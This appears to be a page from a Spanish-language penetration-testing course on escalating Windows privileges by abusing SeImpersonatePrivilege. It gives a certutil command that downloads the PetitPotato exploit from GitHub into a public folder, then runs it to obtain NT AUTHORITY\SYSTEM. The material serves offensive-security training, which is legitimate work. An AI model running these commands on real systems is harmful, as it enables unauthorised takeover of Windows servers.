Escalacion de privilegios en Windows usando SeImpersonatePrivilege

Se recomienda realizar la siguiente lectura:

https://books.spartan-cybersec.com/cpad/post-explotacion-en-windows/abusando-de-los-privilegios-seimpersonateprivilege-seassignprimarytokenprivilege#seimpersonateprivilege

Un comando recomendado que se debe ejecutar luego de comprometer un servidor con sistema operativo Windows es el siguiente para determinar que privilegios tenemos con nuestro usuario actual:

Utilizamos LOLBAS para descargar el siguiente binario:

certutil -urlcache -f https://github.com/wh0amitz/PetitPotato/releases/download/v1.0.0/PetitPotato.exe C:\Users\Public\PetitPotato.exe

Y luego ejecutamos el siguiente comando:

C:\Users\Public\PetitPotato.exe 3 "whoami"

El retorno de este comando sera igual a:

NT AUTHORITY\SYSTEM

Last updated